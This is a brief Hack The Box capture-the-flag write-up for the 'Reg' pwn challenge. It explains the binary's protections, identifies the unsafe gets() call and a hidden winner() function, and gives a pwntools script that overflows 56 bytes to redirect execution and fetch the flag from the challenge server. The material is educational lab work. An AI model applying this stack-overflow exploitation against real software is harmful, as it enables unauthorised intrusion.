HTB [REG] [PWN]
#pwn#htb
Reg
Description:
This is a basic buffer flow exploit. Try to get the flag.
Analysis:
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
- Here NX enabled so we can’t execute our shellcode here
- Let’s decompile this binary
- Main function calls this
run()
function - This just gets input from us and prints
Registered!
gets()
is a vulnerable function, we can able to do buffer overflow here- Let’s search for some useful functions
win function:
- There’s a function called
winner()
- It gives us the flag
- So the goal is to jump to this function
- Now let’s write our exploit
Exploitation part:
- RIP occurs in 56th position
- So let’s fill junk for 56 bytes and put the winner function address next
Exploit script:
from pwn import *
elf = context.binary = ELF("./reg")
p = remote('138.68.188.223',31041)
payload = b'A'*56
payload += p64(elf.sym['winner'])
p.sendline(payload)
p.interactive()
- Cool it worked !!
It would be appreciated if you give me a respect+ on HTB